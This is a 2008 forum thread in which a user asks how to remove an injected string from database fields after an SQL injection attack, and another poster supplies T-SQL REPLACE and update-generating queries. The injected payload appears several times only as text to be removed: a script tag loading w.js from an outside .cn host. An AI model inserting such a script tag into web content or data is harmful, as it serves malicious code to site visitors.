Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
Mindjogger
Starting Member
9 Posts |
 Posted - 2008-09-29 : 05:02:01
|
Hello,we have had an attack by SQL injection. The weaknes is removed but I have a lot of foreign links in my database.So I would like to remove them by scriptThis is what I detected in some of my database fields"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--News Germany I would like to remove by script (update?!) everything before "<!--" and keep the News Germany. Unfortunately "News Germany" is not the same in each data fields. It can be any newspaper or web service.So I am looking for a script which removes the string""></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--" by keeping all other values alive.Does anybody have a idea how to do this?Thank you.B.S.Edit: some type error |
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-29 : 05:56:21
|
UPDATE Table1SET Col1 = REPLACE(Col1, '<script src="http://www0.douhunqn.cn/csrss/w.js"></script>', '')
E 12°55'05.63"N 56°04'39.26" |
 |
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 04:54:30
|
| Hello Peso,thank you very much. Quite simple but running proper. I was a little bit angry about all the special characters like ! or < and / but it is quite ok because of the single quote.One question: can I do this for all columns in a table instead each one by one?Something like: get all columns of table xxxx and do for each table the replaceThank you.B.S.Edit: some type error |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-30 : 05:23:22
|
[code]SELECT 'UPDATE ' + QUOTENAME(TABLE_NAME) + ' SET ' + QUOTENAME(COLUMN_NAME) + ' = REPLACE(' + QUOTENAME(COLUMN_NAME) + ', ''<script src="http://www0.douhunqn.cn/csrss/w.js"></script>'', '''')'FROM INFORMATION_SCHEMA.COLUMNSWHERE DATA_TYPE IN ('nvarchar', 'nchar', 'ntext', 'varchar', 'char', 'text')[/code]
E 12°55'05.63"N 56°04'39.26" |
|
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 06:09:33
|
| What do you mean by QUOTENAME?Thank you.B.S. |
|
|
|
Mindjogger
Starting Member
9 Posts |
Posted - 2008-09-30 : 06:12:38
|
| Hello Peso,thank you. I see that I can either use the select statement to get the details or the REPLACE. Is this right?I have tried without any result:SELECT web_database(t_REF_Comments_table)FROM INFORMATION_SCHEMA.COLUMNSWHERE (DATA_TYPE IN ('nvarchar', 'nchar', 'ntext', 'varchar', 'char', 'text'))Thank you.B.S. |
|
|
|
SwePeso
Patron Saint of Lost Yaks
30421 Posts |
Posted - 2008-09-30 : 06:34:35
|
The SELECT statement provides you with the UPDATE statements.1) Run the SELECT query2) Copy the result to a new query window3) Run the UPDATE queries
E 12°55'05.63"N 56°04'39.26" |
|
|
|
|
|
|
|
|
Remove SQL Injection Hack by script